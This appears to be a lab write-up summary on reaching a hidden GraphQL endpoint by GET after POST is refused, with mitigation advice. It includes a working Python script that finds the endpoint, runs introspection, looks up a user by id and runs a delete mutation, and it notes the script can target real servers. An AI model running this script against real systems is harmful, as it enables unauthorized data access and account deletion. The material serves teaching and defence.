Summary

  • A hidden GraphQL endpoint that rejects POST requests can still be reached by sending the same query as a GET request, with the query carried in the URL query string; some servers only accept GET.
  • In the lab scenario the endpoint is located at /api. It can be found by requesting the paths GraphQL is commonly mounted on, such as /graphql, /api, /api/graphql, /graphql/api and /graphql/graphql.
  • A 405 Method Not Allowed response to a POST is the cue to retry the same path as a GET, placing an introspection query in the query parameter.
  • If introspection succeeds, the returned schema reveals the available queries and mutations. An attacker can then query another user's details by supplying an id variable, and reuse that id in the delete mutation to remove the user's account.
  • To mitigate this, disable introspection in production or restrict it to trusted clients, and enforce authorization on every query and mutation according to the caller's role and permissions, so that knowing an id alone does not grant access to another user's data.
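
The procedure summarised above, as an added worked example written for this page (it is not code from the original article or from the lab). It probes the common paths with POST, falls back to GET on a 405 or any other non-GraphQL answer, then reuses whichever method worked for introspection, a user lookup and the delete mutation. The target host lab.example, the field names getUser and deleteUser, and the in-memory user table are assumptions; a constructed stand-in server is included so the script runs offline, and the same functions work against a real server by passing the http_send transport instead.

```python
import json
import urllib.error
import urllib.parse
import urllib.request

# Paths GraphQL servers are commonly mounted on; /api is where the lab's was found
COMMON_PATHS = ["/graphql", "/api", "/api/graphql", "/graphql/api", "/graphql/graphql"]

# Cheapest valid query: any GraphQL server answers it, so it identifies the endpoint
PROBE_QUERY = "query{__typename}"

# Introspection query; a positive answer means the schema is exposed
INTROSPECTION_QUERY = ("query{__schema{queryType{name}mutationType{name}"
                       "types{name fields{name args{name}}}}}")


def build_get_url(base, path, query, variables=None):
    """GET form of a request: the query (and JSON variables) go in the query string."""
    params = {"query": query}
    if variables is not None:
        params["variables"] = json.dumps(variables)
    return base.rstrip("/") + path + "?" + urllib.parse.urlencode(params)


def looks_like_graphql(status, body):
    """A GraphQL endpoint answers with a JSON object carrying 'data' or 'errors'."""
    if status not in (200, 400):
        return False
    try:
        parsed = json.loads(body)
    except ValueError:
        return False
    return isinstance(parsed, dict) and ("data" in parsed or "errors" in parsed)


def http_send(url, method, body=None):
    """Real transport; returns (status, body_text) even for 4xx/5xx responses."""
    req = urllib.request.Request(url, data=body, method=method)
    if body is not None:
        req.add_header("Content-Type", "application/json")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def find_endpoint(base, send=http_send, paths=COMMON_PATHS):
    """Try each common path with POST, then with GET; return (path, method) or None."""
    for path in paths:
        post_body = json.dumps({"query": PROBE_QUERY}).encode()
        status, body = send(base.rstrip("/") + path, "POST", post_body)
        if looks_like_graphql(status, body):
            return path, "POST"
        # 405 (or any other non-GraphQL answer) on POST: resend the same query via GET
        status, body = send(build_get_url(base, path, PROBE_QUERY), "GET")
        if looks_like_graphql(status, body):
            return path, "GET"
    return None


def run_query(base, path, method, query, variables=None, send=http_send):
    """Send a query or mutation using whichever method the endpoint accepted."""
    if method == "POST":
        body = json.dumps({"query": query, "variables": variables or {}}).encode()
        status, text = send(base.rstrip("/") + path, "POST", body)
    else:
        status, text = send(build_get_url(base, path, query, variables), "GET")
    return status, json.loads(text)


# --- Constructed stand-in for the lab server so the script runs offline ---
# The field names getUser/deleteUser and this user table are assumptions for the demo.
FAKE_USERS = {1: "admin", 2: "alice", 3: "bob"}


def fake_send(url, method, body=None):
    """Mounts GraphQL at /api only, rejects POST with 405, executes GET queries."""
    parsed = urllib.parse.urlparse(url)
    if parsed.path != "/api":
        return 404, "Not Found"
    if method == "POST":
        return 405, "Method Not Allowed"
    params = urllib.parse.parse_qs(parsed.query)
    query = params.get("query", [""])[0]
    variables = json.loads(params.get("variables", ["{}"])[0])
    if "__schema" in query:
        schema = {"queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"}}
        return 200, json.dumps({"data": {"__schema": schema}})
    if "__typename" in query:
        return 200, json.dumps({"data": {"__typename": "Query"}})
    if "getUser" in query:
        uid = variables.get("id")
        return 200, json.dumps({"data": {"getUser": {"id": uid, "username": FAKE_USERS.get(uid)}}})
    if query.startswith("mutation") and "deleteUser" in query:
        FAKE_USERS.pop(variables.get("id"), None)  # no authorization check: the flaw being abused
        return 200, json.dumps({"data": {"deleteUser": {"success": True}}})
    return 400, json.dumps({"errors": [{"message": "unknown operation"}]})


if __name__ == "__main__":
    base = "http://lab.example"  # placeholder host, answered by fake_send
    path, method = find_endpoint(base, send=fake_send)
    print("endpoint:", path, "via", method)
    print(run_query(base, path, method, INTROSPECTION_QUERY, send=fake_send)[1])
    print(run_query(base, path, method, "query getUser($id: Int!){getUser(id:$id){id username}}",
                    {"id": 3}, send=fake_send)[1])
    print(run_query(base, path, method, "mutation deleteUser($id: Int!){deleteUser(id:$id){success}}",
                    {"id": 3}, send=fake_send)[1])
```

Two details matter when pointing this at a real target: looks_like_graphql deliberately treats a 400 with an errors array as a hit, since a malformed probe still proves a GraphQL parser is listening, and the GET fallback is only tried after POST fails on that path, which is exactly the 405-then-GET sequence the lab relies on. Sending a mutation over GET is outside what the GraphQL specification recommends, so a server that accepts it (as the stand-in does) is already misconfigured.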

By Bash Overflow

Original Article